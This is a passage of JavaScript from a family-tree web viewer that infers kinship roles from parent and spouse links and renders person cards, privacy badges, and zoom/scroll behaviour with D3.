                    p.represented_by_user_id != null
                    && String(p.represented_by_user_id) === String(creatorUserId)
                );
                creatorPersonId = creatorRecord ? creatorRecord.id : null;
            }

            // Anchor Person id is whatever the active perspective points at.
            // Stored on appState so the toggle handler can re-render with a
            // different anchor without changing this file's structure.
            const perspective = appState.ftvPerspective || 'viewer';
            const anchorPersonId = (perspective === 'creator' && creatorPersonId != null)
                ? creatorPersonId
                : viewerPersonId;

            relationships.forEach(rel => {
                const fromId = rel.from && rel.from.id;
                const toId = rel.to && rel.to.id;

                // Direction semantics (from the backend's add_relationship):
                //   CHILD_OF:         from = child,       to = parent
                //   SPOUSE_OF:        bidirectional (auto-mirrored)
                //   SIBLING_OF:       bidirectional (auto-mirrored)
                //   COUSIN_OF:        bidirectional (auto-mirrored)
                //   AUNT_UNCLE_OF:    from = aunt/uncle,  to = niece/nephew
                //   NIECE_NEPHEW_OF:  from = niece/nephew, to = aunt/uncle
                //   GRANDPARENT_OF:   from = grandparent, to = grandchild
                //   GRANDCHILD_OF:    from = grandchild,  to = grandparent
                if (anchorPersonId != null) {
                    if (rel.type === 'SPOUSE_OF') {
                        if (fromId === anchorPersonId) spouseSet.add(toId);
                        if (toId === anchorPersonId) spouseSet.add(fromId);
                    } else if (rel.type === 'CHILD_OF') {
                        if (fromId === anchorPersonId) parentSet.add(toId); // anchor's parent
                        if (toId === anchorPersonId) childSet.add(fromId);  // anchor's child
                    } else if (rel.type === 'SIBLING_OF') {
                        if (fromId === anchorPersonId) siblingSet.add(toId);
                        if (toId === anchorPersonId) siblingSet.add(fromId);
                    }
                    // 2026-07-23 (derived-types cleanup — post-Chunk-C fix):
                    // Direct extended-type edges (AUNT_UNCLE_OF, NIECE_NEPHEW_OF,
                    // COUSIN_OF, GRANDPARENT_OF, GRANDCHILD_OF) intentionally
                    // NOT consumed here anymore. Consuming them populated the
                    // role sets from raw edges, so a Person with a residual
                    // direct edge landed in grandparentSet → hover said
                    // "Extended family / Grandfather" — even though
                    // buildParentChildComponents ignores those edges → floater
                    // card. Two signals from two different sources.
                    // The T12 multi-hop derivation below (lines ~11506+) fills
                    // the role sets from CHILD_OF+SPOUSE_OF chains, matching
                    // the layout's own truth source. Chain-consistent by
                    // construction; floaters correctly get the "Not yet
                    // connected" hover branch instead of a mislabeled
                    // "Extended family / X".
                }
                if (fromId != null) connectedSet.add(fromId);
                if (toId != null) connectedSet.add(toId);
            });

            // Expose for the chrome-render path so it knows whether to show
            // the perspective toggle (only shown when viewer ≠ creator).
            appState._ftvViewerPersonId = viewerPersonId;
            appState._ftvCreatorPersonId = creatorPersonId;

            // === Phase 2.5 T12: multi-hop kin inference ===
            // Above we populated the role sets from EXPLICIT edges only
            // (GRANDPARENT_OF, AUNT_UNCLE_OF, etc.). Most trees don't have
            // those explicit edges — kinship is implied by CHILD_OF chains
            // + SPOUSE_OF pairs. Under T12 we walk those chains from the
            // anchor and fill in:
            //   - Grandparent / Grandchild (2-hop CHILD_OF)
            //   - Aunt / Uncle (parent's sibling + their spouses)
            //   - Cousin (aunt/uncle's child)
            //   - Niece / Nephew (sibling's child)
            //   - Half-sibling (shares one parent, not both)
            //   - Stepparent (parent's spouse who isn't the other parent)
            //   - Stepchild (spouse's child who isn't anchor's child)
            //
            // Explicit edges still win — this step only ADDS entries, never
            // overwrites. Full-sibling vs. half-sibling is decided by
            // comparing parent sets.
            const halfSiblingSet = new Set();
            const stepparentSet = new Set();
            const stepchildSet = new Set();

            if (anchorPersonId != null) {
                const parentsOfIndex = new Map();   // id → [parent ids]
                const childrenOfIndex = new Map();  // id → [child ids]
                const spousesOfIndex = new Map();   // id → Set of spouse ids
                relationships.forEach(rel => {
                    const fId = rel.from && rel.from.id;
                    const tId = rel.to && rel.to.id;
                    if (fId == null || tId == null) return;
                    if (rel.type === 'CHILD_OF') {
                        if (!parentsOfIndex.has(fId)) parentsOfIndex.set(fId, []);
                        if (!parentsOfIndex.get(fId).includes(tId)) parentsOfIndex.get(fId).push(tId);
                        if (!childrenOfIndex.has(tId)) childrenOfIndex.set(tId, []);
                        if (!childrenOfIndex.get(tId).includes(fId)) childrenOfIndex.get(tId).push(fId);
                    } else if (rel.type === 'SPOUSE_OF') {
                        if (!spousesOfIndex.has(fId)) spousesOfIndex.set(fId, new Set());
                        if (!spousesOfIndex.has(tId)) spousesOfIndex.set(tId, new Set());
                        spousesOfIndex.get(fId).add(tId);
                        spousesOfIndex.get(tId).add(fId);
                    }
                });

                const anchorParents = parentsOfIndex.get(anchorPersonId) || [];
                const anchorChildren = childrenOfIndex.get(anchorPersonId) || [];
                const anchorSpouses = [...(spousesOfIndex.get(anchorPersonId) || [])];
                const anchorParentSetForCheck = new Set(anchorParents);
                const anchorChildSetForCheck = new Set(anchorChildren);

                anchorParents.forEach(pid => parentSet.add(pid));
                anchorChildren.forEach(cid => childSet.add(cid));
                anchorSpouses.forEach(sid => spouseSet.add(sid));

                // Grandparents = parents of anchor's parents. Plus (T12
                // amendment / option B): senior spouses of those biological
                // grandparents also render as Grandmother / Grandfather. In
                // polygamous families this catches Michael JO's other wives
                // — they're not biological grandmothers of Olu Jr but are
                // culturally treated as such in African family contexts.
                anchorParents.forEach(pid => {
                    const gps = parentsOfIndex.get(pid) || [];
                    gps.forEach(gp => grandparentSet.add(gp));
                });
                const bioGrandparents = [...grandparentSet];
                bioGrandparents.forEach(gp => {
                    const sps = spousesOfIndex.get(gp) || new Set();
                    sps.forEach(sp => grandparentSet.add(sp));
                });

                // Grandchildren = children of anchor's children.
                anchorChildren.forEach(cid => {
                    const gcs = childrenOfIndex.get(cid) || [];
                    gcs.forEach(gc => grandchildSet.add(gc));
                });

                // Siblings — full share ALL parents with anchor, half share
                // at least one. Iterate candidates = other children of any
                // of anchor's parents.
                const siblingCandidates = new Set();
                anchorParents.forEach(pid => {
                    const kids = childrenOfIndex.get(pid) || [];
                    kids.forEach(k => { if (k !== anchorPersonId) siblingCandidates.add(k); });
                });
                siblingCandidates.forEach(sib => {
                    const sibParents = new Set(parentsOfIndex.get(sib) || []);
                    const shared = [...sibParents].filter(p => anchorParentSetForCheck.has(p));
                    const isFull = anchorParents.length > 0
                        && shared.length === anchorParents.length
                        && shared.length === sibParents.size;
                    if (isFull) siblingSet.add(sib);
                    else if (shared.length > 0) halfSiblingSet.add(sib);
                });

                // Aunts / Uncles — siblings of anchor's parents, plus those
                // siblings' spouses (aunt/uncle by marriage). Skip anyone
                // who's already been identified as a parent of anchor.
                anchorParents.forEach(pid => {
                    const gps = parentsOfIndex.get(pid) || [];
                    gps.forEach(gp => {
                        const kids = childrenOfIndex.get(gp) || [];
                        kids.forEach(k => {
                            if (k === pid) return;
                            if (anchorParentSetForCheck.has(k)) return;
                            auntUncleSet.add(k);
                            const kSpouses = spousesOfIndex.get(k) || new Set();
                            kSpouses.forEach(sp => {
                                if (!anchorParentSetForCheck.has(sp)) auntUncleSet.add(sp);
                            });
                        });
                    });
                });

                // Cousins — children of aunts / uncles.
                auntUncleSet.forEach(au => {
                    const kids = childrenOfIndex.get(au) || [];
                    kids.forEach(k => {
                        if (k === anchorPersonId) return;
                        cousinSet.add(k);
                    });
                });

                // Nieces / Nephews — children of anchor's full + half siblings.
                [...siblingSet, ...halfSiblingSet].forEach(sib => {
                    const kids = childrenOfIndex.get(sib) || [];
                    kids.forEach(k => nieceNephewSet.add(k));
                });

                // Stepparents — spouses of anchor's parents who aren't
                // themselves anchor's parents.
                anchorParents.forEach(pid => {
                    const sps = spousesOfIndex.get(pid) || new Set();
                    sps.forEach(sp => {
                        if (!anchorParentSetForCheck.has(sp)) stepparentSet.add(sp);
                    });
                });

                // Stepchildren — children of anchor's spouses who aren't
                // themselves anchor's children.
                anchorSpouses.forEach(sp => {
                    const kids = childrenOfIndex.get(sp) || [];
                    kids.forEach(k => {
                        if (!anchorChildSetForCheck.has(k)) stepchildSet.add(k);
                    });
                });
            }

            // Assign roles with priority. Grandparent > Parent > Stepparent
            // > Aunt/Uncle > Spouse > Cousin > Sibling > Half-sibling >
            // Niece/Nephew > Grandchild > Stepchild > Child. Half-sibling
            // sits below full sibling so someone who's both (rare) gets the
            // stronger label.
            persons.forEach(p => {
                let role = '';
                const isParent = parentSet.has(p.id);
                const isSpouse = spouseSet.has(p.id);
                const isChild = childSet.has(p.id);

                if (grandparentSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Grandfather' : p.gender === 'female' ? 'Grandmother' : 'Grandparent';
                } else if (isParent) {
                    role = p.gender === 'male' ? 'Father' : p.gender === 'female' ? 'Mother' : 'Parent';
                } else if (stepparentSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Stepfather' : p.gender === 'female' ? 'Stepmother' : 'Stepparent';
                } else if (auntUncleSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Uncle' : p.gender === 'female' ? 'Aunt' : 'Aunt/Uncle';
                } else if (isSpouse) {
                    role = 'Spouse';
                } else if (cousinSet.has(p.id)) {
                    role = 'Cousin';
                } else if (siblingSet.has(p.id) && !isChild) {
                    role = p.gender === 'male' ? 'Brother' : p.gender === 'female' ? 'Sister' : 'Sibling';
                } else if (halfSiblingSet.has(p.id) && !isChild) {
                    role = p.gender === 'male' ? 'Half-brother' : p.gender === 'female' ? 'Half-sister' : 'Half-sibling';
                } else if (nieceNephewSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Nephew' : p.gender === 'female' ? 'Niece' : 'Niece/Nephew';
                } else if (grandchildSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Grandson' : p.gender === 'female' ? 'Granddaughter' : 'Grandchild';
                } else if (stepchildSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Stepson' : p.gender === 'female' ? 'Stepdaughter' : 'Stepchild';
                } else if (isChild) {
                    role = p.gender === 'male' ? 'Son' : p.gender === 'female' ? 'Daughter' : 'Child';
                } else if (siblingSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Brother' : p.gender === 'female' ? 'Sister' : 'Sibling';
                } else if (halfSiblingSet.has(p.id)) {
                    role = p.gender === 'male' ? 'Half-brother' : p.gender === 'female' ? 'Half-sister' : 'Half-sibling';
                }
                if (role) roleMap.set(p.id, role);
            });

            // Create enhanced node cards
            node.each(function(d) {
                const nodeGroup = d3.select(this);
                const person = d.data;

                // Card dimensions
                // Phase 2: 150×110 cards. Was 130×100 (mockup dimension) —
                // widened after user feedback that African names (many are
                // 18–22 characters like "Oluwanifemi Olaniyan") were rendering
                // edge-to-edge with zero visible padding. Wider cards + a
                // stricter 32px padding budget (see maxNameWidth below)
                // reserve visible space around every name and make
                // truncation predictable when it's needed.
                const cardW = 150, cardH = 110, cardR = 8;
                const halfW = cardW / 2, halfH = cardH / 2;

                // Phase 2: viewer's Person gets the YOU treatment (2px
                // --ebw-accent border + YOU pill at top). Other cards use
                // a clean white-on-beige aesthetic.
                const isViewer = person.id != null
                    && appState._ftvViewerPersonId != null
                    && person.id === appState._ftvViewerPersonId;
                const isFloater = person.id != null && !connectedSet.has(person.id) && !isViewer;
                const isDeceased = person.is_alive === false || person.death_year != null;

                // Phase 2 card: white surface, --ebw-border (1px) or --ebw-accent
                // (2px) for viewer or dashed --ebw-connector for floater.
                const cardFill = isDeceased ? '#FAF6EE' : '#FFFFFF';
                const cardStroke = isViewer
                    ? '#E89234'              // --ebw-accent
                    : (isFloater ? '#C8B89E' : '#D8CFC0');  // --ebw-connector dashed / --ebw-border
                const cardStrokeWidth = isViewer ? 2 : 1;
                nodeGroup.append("rect")
                    .attr("class", "node-card")
                    .attr("x", -halfW)
                    .attr("y", -halfH)
                    .attr("width", cardW)
                    .attr("height", cardH)
                    .attr("rx", cardR)
                    .attr("ry", cardR)
                    .attr("fill", cardFill)
                    .attr("stroke", cardStroke)
                    .attr("stroke-width", cardStrokeWidth)
                    .attr("stroke-dasharray", isFloater ? '6,4' : null);

                if (isViewer) {
                    // YOU pill at top: small orange chip, white text, uppercase.
                    // Positioned -8px above the top edge, centered.
                    const youW = 32;
                    nodeGroup.append("rect")
                        .attr("x", -youW / 2)
                        .attr("y", -halfH - 9)
                        .attr("width", youW)
                        .attr("height", 16)
                        .attr("rx", 4)
                        .attr("fill", '#E89234');  // --ebw-accent
                    nodeGroup.append("text")
                        .attr("x", 0)
                        .attr("y", -halfH + 2)
                        .attr("text-anchor", "middle")
                        .attr("font-size", "9px")
                        .attr("font-weight", "600")
                        .attr("fill", '#FFFFFF')
                        .attr("letter-spacing", "0.06em")
                        .text("YOU");
                } else if (isFloater) {
                    // Phase 2: "+ Connect to me" affordance replaces the
                    // old "Unconnected" pill. Click opens the add-relationship
                    // modal pre-populated with this Person as the target and
                    // the viewer as the source. The whole card + pill are
                    // clickable; we attach the handler at the nodeGroup level
                    // below (the existing card-click behaviour already opens
                    // person-detail; the floater-click overrides it).
                    const connectW = 96;
                    nodeGroup.append("rect")
                        .attr("x", -connectW / 2)
                        .attr("y", -halfH - 9)
                        .attr("width", connectW)
                        .attr("height", 16)
                        .attr("rx", 4)
                        .attr("fill", '#FFFFFF')
                        .attr("stroke", '#E89234')
                        .attr("stroke-width", 1)
                        .attr("stroke-dasharray", '3,2')
                        .style("cursor", "pointer");
                    nodeGroup.append("text")
                        .attr("x", 0)
                        .attr("y", -halfH + 2)
                        .attr("text-anchor", "middle")
                        .attr("font-size", "9px")
                        .attr("font-weight", "600")
                        .attr("fill", '#C66E1F')
                        .style("cursor", "pointer")
                        .text("+ Connect to me");
                }

                // Phase 2: flat heritage palette per person (deterministic).
                // Deceased gets muted brown. Replaces the gender-specific
                // gradients with the new mockup's white-and-warm aesthetic.
                const avatarBgColor = personAvatarBg(person);
                const avatarTextColor = personAvatarColor(person);

                // --- Vertical stacked layout: avatar top-center, name below ---
                // Phase 2.5 T5: avatar 44px diameter (radius 22) in the main
                // tree per the brief. Positioned 27px from card top so the
                // 44px-diameter portrait sits with ~5px above and clears the
                // YOU pill that overlaps the card's top edge.
                const avatarCx = 0;
                const avatarCy = -halfH + 27;
                const avatarR = 22;

                // Clip path for circular photo
                const clipId = `clip-${person.id}`;
                defs.append("clipPath")
                    .attr("id", clipId)
                    .append("circle")
                    .attr("cx", avatarCx)
                    .attr("cy", avatarCy)
                    .attr("r", avatarR);

                // Phase 3: per-profile privacy. Private profiles show initials
                // instead of the photo (avatar de-identified) + a small lock
                // glyph overlapping the bottom-right of the avatar. Owner
                // viewing their own Person still sees full data but keeps the
                // lock glyph so the private state is visible at a glance.
                const isPrivateForViewer = personIsPrivate(person)
                    && !canViewField(appState._ftvViewerPersonId, person, 'photo');
                const showLockGlyph = personIsPrivate(person);
                // T5 portrait-frame ring — 2px #E8DCC7 warm ring on every
                // avatar. Applied by stroking the main avatar circle so the
                // frame reads consistently across photo + initials branches.
                if (!isPrivateForViewer && person.profile_photo_url && person.profile_photo_url.trim().length > 0) {
                    // Photo avatar: white fill under image + 2px portrait
                    // frame stroke, then image clipped to inner circle.
                    nodeGroup.append("circle")
                        .attr("cx", avatarCx)
                        .attr("cy", avatarCy)
                        .attr("r", avatarR)
                        .attr("fill", "#ffffff")
                        .attr("stroke", "#E8DCC7")
                        .attr("stroke-width", 2);
                    nodeGroup.append("image")
                        .attr("x", avatarCx - avatarR)
                        .attr("y", avatarCy - avatarR)
                        .attr("width", avatarR * 2)
                        .attr("height", avatarR * 2)
                        .attr("clip-path", `url(#${clipId})`)
                        .attr("preserveAspectRatio", "xMidYMid slice")
                        .attr("href", person.profile_photo_url);
                } else {
                    // Initials avatar on heritage colour + same portrait frame.
                    nodeGroup.append("circle")
                        .attr("cx", avatarCx)
                        .attr("cy", avatarCy)
                        .attr("r", avatarR)
                        .attr("fill", avatarBgColor)
                        .attr("stroke", "#E8DCC7")
                        .attr("stroke-width", 2);

                    const initials = `${person.first_name?.charAt(0) || ''}${person.last_name?.charAt(0) || ''}`;
                    // Bump initials font-size to fill the larger 44px avatar.
                    nodeGroup.append("text")
                        .attr("x", avatarCx)
                        .attr("y", avatarCy + 9)
                        .attr("text-anchor", "middle")
                        .attr("font-size", "22px")
                        .attr("font-weight", "500")
                        .attr("fill", avatarTextColor)
                        .text(initials.toUpperCase());
                }

                // Phase 3: lock glyph on private profiles — overlaps the
                // avatar's bottom-right corner in a small surface-colored circle,
                // so it reads as a badge, not a decoration. Shown for both
                // isPrivateForViewer (others viewing a private card) and for
                // the owner-viewing-own-private case (self-view marker).
                if (showLockGlyph) {
                    const lockCx = avatarCx + avatarR - 2;
                    const lockCy = avatarCy + avatarR - 2;
                    nodeGroup.append("circle")
                        .attr("cx", lockCx)
                        .attr("cy", lockCy)
                        .attr("r", 7)
                        .attr("fill", '#FFFFFF')     // --ebw-bg-surface
                        .attr("stroke", '#D8CFC0')   // --ebw-border
                        .attr("stroke-width", 1);
                    // Simple lock glyph (small padlock outline).
                    nodeGroup.append("path")
                        .attr("d", `M ${lockCx - 2.5} ${lockCy - 0.5} v -1.8 a 2.5 2.5 0 0 1 5 0 v 1.8 M ${lockCx - 3} ${lockCy - 0.5} h 6 v 4 h -6 z`)
                        .attr("fill", "none")
                        .attr("stroke", '#6B5947')   // --ebw-rip-text / muted brown
                        .attr("stroke-width", 1.1)
                        .attr("stroke-linecap", "round")
                        .attr("stroke-linejoin", "round");
                }

                // Phase 2: RIP pill restyled — top-right corner, --ebw-rip-bg
                // background, --ebw-rip-text text, letter-spacing 0.06em.
                if (isDeceased) {
                    const ripW = 26;
                    nodeGroup.append("rect")
                        .attr("x", halfW - ripW - 8)
                        .attr("y", -halfH + 8)
                        .attr("width", ripW)
                        .attr("height", 14)
                        .attr("rx", 3)
                        .attr("fill", '#F0E7D6');  // --ebw-rip-bg
                    nodeGroup.append("text")
                        .attr("x", halfW - ripW / 2 - 8)
                        .attr("y", -halfH + 18)
                        .attr("text-anchor", "middle")
                        .attr("font-size", "8px")
                        .attr("font-weight", "500")
                        .attr("fill", '#6B5947')  // --ebw-rip-text
                        .attr("letter-spacing", "0.06em")
                        .text("RIP");
                }

                // --- Name: single-line only (mockup #2). Uses canvas-based
                // measurement to fit the name to the actual pixel budget
                // (Outfit/Inter have wide capitals that make character-width
                // heuristics wrong for African given names). Prefers
                // "Oluwatoyin A." over "Oluwatoyin Akan…" when the full
                // "First Last" doesn't fit — see fitPersonNameToWidth.
                //
                // Padding budget: cardW - 32 reserves 16px on each side so
                // no name ever renders edge-to-edge. African names run long
                // (Oluwanifemi, Oluwadara, Oluwadamilola) and stricter
                // padding forces cleaner "First L." truncation everywhere
                // it's needed rather than letting some cards look cramped.
                // T5/T13: Lora 13px 500 for names — warmer heritage serif
                // than Playfair Display. Georgia is the fallback if the
                // Google Font hasn't loaded. Canvas-based fit-to-width
                // honors the actual metrics of the loaded face.
                const maxNameWidth = cardW - 32;
                const displayName = fitPersonNameToWidth(
                    person, maxNameWidth, 13, 500, "'Lora', Georgia, serif"
                );
                const nameY = avatarCy + avatarR + 16;

                nodeGroup.append("text")
                    .attr("x", 0)
                    .attr("y", nameY)
                    .attr("text-anchor", "middle")
                    .attr("font-family", "'Lora', Georgia, serif")
                    .attr("font-size", "13px")
                    .attr("font-weight", "500")
                    .attr("fill", "#2A1F17")
                    .text(displayName);

                // T5 dates: 10px sans, hint color, 12px below name baseline.
                // Phase 3 privacy: hidden when the viewer isn't the owner.
                let bottomText = '';
                const canSeeDates = canViewField(appState._ftvViewerPersonId, person, 'dates');
                if (canSeeDates && person.birth_year && person.death_year) {
                    bottomText = `${person.birth_year} – ${person.death_year}`;
                } else if (canSeeDates && person.birth_year) {
                    bottomText = `b. ${person.birth_year}`;
                } else if (canSeeDates && person.death_year) {
                    bottomText = `d. ${person.death_year}`;
                }
                if (bottomText) {
                    nodeGroup.append("text")
                        .attr("x", 0)
                        .attr("y", nameY + 13)
                        .attr("text-anchor", "middle")
                        .attr("font-size", "10px")
                        .attr("font-weight", "400")
                        .attr("fill", "#9C8770")
                        .text(bottomText);
                }

                // Phase 2: role pill restyled. Bottom-centered (was bottom-
                // left), --ebw-accent-light bg, --ebw-accent-ink text, 9px,
                // padding 2px 8px, radius 3px. Suppressed for the viewer (the
                // YOU pill at top is the only identity marker; no "Self"
                // label needed).
                const role = roleMap.get(person.id);
                if (!isViewer && role) {
                    const badgeW = role.length * 5.5 + 12;
                    const badgeX = -badgeW / 2;
                    const badgeY = halfH - 15;
                    nodeGroup.append("rect")
                        .attr("x", badgeX)
                        .attr("y", badgeY)
                        .attr("width", badgeW)
                        .attr("height", 12)
                        .attr("rx", 3)
                        .attr("fill", '#FAF0E2');  // --ebw-accent-light
                    nodeGroup.append("text")
                        .attr("x", 0)
                        .attr("y", badgeY + 9)
                        .attr("text-anchor", "middle")
                        .attr("font-size", "9px")
                        .attr("font-weight", "500")
                        .attr("fill", '#C66E1F')  // --ebw-accent-ink
                        .text(role);
                }

                // Phase 2: floater click opens the Add Relationship modal
                // pre-populated with this Person as the target and the
                // viewer as the source. Attached at the nodeGroup level so
                // the entire card is the affordance, matching the mockup.
                if (isFloater && appState._ftvViewerPersonId != null) {
                    nodeGroup.style("cursor", "pointer").on("click", () => {
                        try {
                            openAddRelationshipModal({
                                fromPersonId: appState._ftvViewerPersonId,
                                toPersonId: person.id,
                            });
                        } catch (e) {
                            // Fallback to plain open if the modal doesn't
                            // accept prefill args yet.
                            openAddRelationshipModal();
                        }
                    });
                }
            });

            // Relationships legend removed — the Phase 2 warm-heritage
            // connector palette + Phase 2.5 marriage-line + unity-dot
            // convention are self-evident, and the legend swatches showed
            // the pre-Phase-2 bright coral spouse edge which no longer
            // matches what's drawn.

            // Calculate generation info for hover tooltips. Use the same
            // BFS-computed depth map the layout uses so tooltip labels stay
            // consistent with visible row placement.
            const generationDepths = new Map();

            allNodes.forEach(d => {
                const gen = genDepthOf.has(d.data.id) ? genDepthOf.get(d.data.id) : d.depth;
                if (!generationDepths.has(gen)) generationDepths.set(gen, []);
                generationDepths.get(gen).push(d.data);
            });

            // Reference generation = the viewer's own depth. Labels are
            // relative to YOU (Parents, Grandparents, etc.), so the viewer's
            // depth is the anchor. Falls back to the middle of the depth
            // range if the viewer has no resolvable Person.
            let referenceDepth;
            if (viewerPersonIdEarly != null && genDepthOf.has(viewerPersonIdEarly)) {
                referenceDepth = genDepthOf.get(viewerPersonIdEarly);
            } else {
                referenceDepth = Math.floor(generationDepths.size / 2);
            }

            // Function to get traditional generation label
            function getGenerationLabel(depth, referenceDepth) {
                const diff = depth - referenceDepth;
                if (diff === 0) return "Your Generation";
                else if (diff === -4) return "Great-Great-Grandparents";
                else if (diff === -3) return "Great-Grandparents";
                else if (diff === -2) return "Grandparents";
                else if (diff === -1) return "Parents";
                else if (diff === 1) return "Children";
                else if (diff === 2) return "Grandchildren";
                else if (diff === 3) return "Great-Grandchildren";
                else if (diff === 4) return "Great-Great-Grandchildren";
                else if (diff < -4) return `${Math.abs(diff + 2)} x Great-Grandparents`;
                else if (diff > 4) return `${diff - 2} x Great-Grandchildren`;
                return "Relatives";
            }

            // Create tooltip div for generation info on card hover
            let cardTooltip = d3.select("body").select(".tree-card-tooltip");
            if (cardTooltip.empty()) {
                cardTooltip = d3.select("body").append("div")
                    .attr("class", "tree-card-tooltip")
                    .style("position", "absolute")
                    .style("background", "rgba(0, 0, 0, 0.9)")
                    .style("color", "white")
                    .style("padding", "10px 14px")
                    .style("border-radius", "8px")
                    .style("font-size", "14px")
                    .style("font-weight", "500")
                    .style("pointer-events", "none")
                    .style("opacity", 0)
                    .style("z-index", 2000)
                    .style("transition", "opacity 0.2s")
                    .style("box-shadow", "0 4px 6px rgba(0,0,0,0.3)")
                    .style("white-space", "nowrap");
            }

            // T6: post-render, size the SVG to the tree's content bounds
            // in FULL mode and wire the horizontal-scroll chrome. Cards are
            // 150 wide and 110 tall — pad by half a card each way plus a
            // little breathing room so the edge cards' portrait frames don't
            // touch the clip edge.
            if (effectiveFocus !== 'focused' && allNodes.length > 0) {
                let contentMinX = Infinity, contentMaxX = -Infinity;
                let contentMinY = Infinity, contentMaxY = -Infinity;
                allNodes.forEach(n => {
                    if (n.x < contentMinX) contentMinX = n.x;
                    if (n.x > contentMaxX) contentMaxX = n.x;
                    if (n.y < contentMinY) contentMinY = n.y;
                    if (n.y > contentMaxY) contentMaxY = n.y;
                });
                // Tree's horizontal bounding box: node centers extended by
                // card half-width (75) on each side. Connectors and marriage
                // lines stay within node bboxes.
                const cardHalfW = 75;
                const bboxPadX = 40;
                const treeMinX = contentMinX - cardHalfW;
                const treeMaxX = contentMaxX + cardHalfW;
                const treeWidth = treeMaxX - treeMinX;
                const contentWidth = treeWidth + bboxPadX * 2;

                const padTop = 140;  // room for the "Unconnected" label + YOU pill
                const padBottom = 80;
                const svgH = (contentMaxY - contentMinY) + padTop + padBottom;
                const viewMinY = contentMinY - padTop;

                const clipEl = document.getElementById('ebw-ftv-scroll-clip');
                const svgViewportWidth = clipEl ? clipEl.clientWidth : contentWidth;
                const isTouchFull = _isTouchDevice();

                if (isTouchFull) {
                    // Touch Full mode: d3.zoom is the SOLE transform owner.
                    // SVG sized like Focused (viewport-width, natural height),
                    // g.transform starts as a fit-to-width scale/translate,
                    // pinch/two-finger-pan takes over from there. Skip the
                    // offsetX transform, scroll bands, and geometry snapshot —
                    // any of them would fight the zoom.
                    const fitScale = Math.min(svgViewportWidth / treeWidth, 1);
                    const treeCenterX = (treeMinX + treeMaxX) / 2;
                    const initTx = svgViewportWidth / 2 - treeCenterX * fitScale;
                    const initTy = padTop - contentMinY * fitScale;
                    const initialTransform = d3.zoomIdentity.translate(initTx, initTy).scale(fitScale);

                    svg.attr("width", svgViewportWidth)
                       .attr("height", svgH)
                       .attr("viewBox", `0 0 ${svgViewportWidth} ${svgH}`)
                       .style("width", svgViewportWidth + "px")
                       .style("height", svgH + "px");

                    const zoomPad = 200;
                    treeZoomBehavior = d3.zoom()
                        .filter(_zoomFilter)
                        .scaleExtent([0.4, 2.5])
                        .translateExtent([
                            [treeMinX - zoomPad, contentMinY - zoomPad],
                            [treeMaxX + zoomPad, contentMaxY + zoomPad],
                        ])
                        .on("zoom", (event) => {
                            g.attr("transform", event.transform);
                        });
                    svg.call(treeZoomBehavior);
                    svg.on('dblclick.zoom', null);
                    svg.call(treeZoomBehavior.transform, initialTransform);
                    // Store for the Fit-to-view button. Refreshed in
                    // _refitTouchFullOnResize below.
                    _ftvFitTransform = initialTransform;

                    // Save initial transform + bounds for _refitFtvOnResize;
                    // null the desktop geom snapshot so the desktop recenter
                    // path silently no-ops. _ftvCurrentFitK feeds the zoom
                    // filter's "zoomed past fit?" test for single-finger pan.
                    _ftvTouchFullInitialTransform = initialTransform;
                    _ftvCurrentFitK = fitScale;
                    _ftvTouchFullBounds = {
                        treeMinX, treeMaxX, treeWidth,
                        contentMinY, contentMaxY, svgH, padTop,
                    };
                    _ftvFullModeGeom = null;
                    _ftvFocusedGeom = null;
                    _wireFtvResizeObserver();
                } else {
                    // Desktop Full mode: unchanged. SVG width = max(content,
                    // viewport). Root <g> gets an X translate that centers
                    // content inside the SVG in both cases. Scroll bands +
                    // recenter-on-resize wired for wide-tree navigation.
                    const svgWidth = Math.max(contentWidth, svgViewportWidth);
                    const offsetX = (svgWidth - treeWidth) / 2 - treeMinX;

                    svg.attr("width", svgWidth)
                       .attr("height", svgH)
                       .attr("viewBox", `0 ${viewMinY} ${svgWidth} ${svgH}`)
                       .style("width", svgWidth + "px")
                       .style("height", svgH + "px");

                    g.attr("transform", `translate(${offsetX}, 0)`);

                    _ftvFullModeGeom = {
                        treeMinX, treeMaxX, treeWidth,
                        contentWidth, svgH, viewMinY,
                    };
                    _ftvTouchFullInitialTransform = null;
                    _ftvTouchFullBounds = null;
                    _ftvCurrentFitK = null;
                    _ftvFocusedGeom = null;
                    // Desktop Full doesn't use d3.zoom; the Fit-to-view
                    // button no-ops (guards on treeZoomBehavior).
                    _ftvFitTransform = null;
                    _wireFtvHorizontalScroll();
                    _wireFtvResizeObserver();
                }
            } else {
                // Focused mode: reset any Full-mode chrome that may have
                // been active from a previous render, and restore the
                // responsive viewBox.
                // Clear Full-mode geometry snapshots (both desktop and
                // touch) so no stale resize callback fires after mode swap.
                // Focused's own _ftvCurrentFitK is set above in the Focused
                // setup branch — no need to null it here.
                _ftvFullModeGeom = null;
                _ftvTouchFullInitialTransform = null;
                _ftvTouchFullBounds = null;
                // (Full-mode class already removed by _applyFtvModeClass
                // at renderFamilyTree's top — canvas is under the
                // Focused-mode flex-fill CSS regime by the time we
                // measure and size the SVG below.)
                // Dynamic viewBox height sourced from the geom snapshot
                // (populated up in the Focused d3.zoom setup a few
                // thousand lines above, from the same scroll-clip
                // dimensions we're about to fill). height:100% + width:
                // 100% + flex-column canvas (CSS) means the SVG box
                // fills the whole canvas — no dead zone. The Focused
                // CSS branch above sets height:100%; the inline style
                // still writes it for safety on browsers where the
                // cascade order matters.
                const _focViewBoxH = _ftvFocusedGeom ? _ftvFocusedGeom.viewBoxH : height;
                // Remove the width/height ATTRIBUTES. Those become the
                // SVG's intrinsic size, which the browser can propagate
                // up through flex parents when their children are
                // content-sized — creating a feedback loop where the
                // viewBox height grows the container height grows the
                // viewBox height. Style width/height 100% and the
                // viewBox alone (which defines aspect ratio) are all
                // that's needed.
                svg.attr("width", null)
                   .attr("height", null)
                   .attr("viewBox", `0 0 ${width} ${_focViewBoxH}`)
                   .style("width", "100%")
                   .style("height", "100%");
                // Wire the ResizeObserver in Focused too (previously only
                // Full modes armed it) so orientation + browser resize
                // triggers _refitFtvFocusedOnResize below.
                _wireFtvResizeObserver();
            }

            // Focused content-bounds fit — runs AFTER layout so we can
            // read actual node positions. Replaces the placeholder
            // translateExtent + initial transform from the Focused
            // setup block above. Bug fixed: the prior setup computed
            // translateExtent from viewBox-based design constants
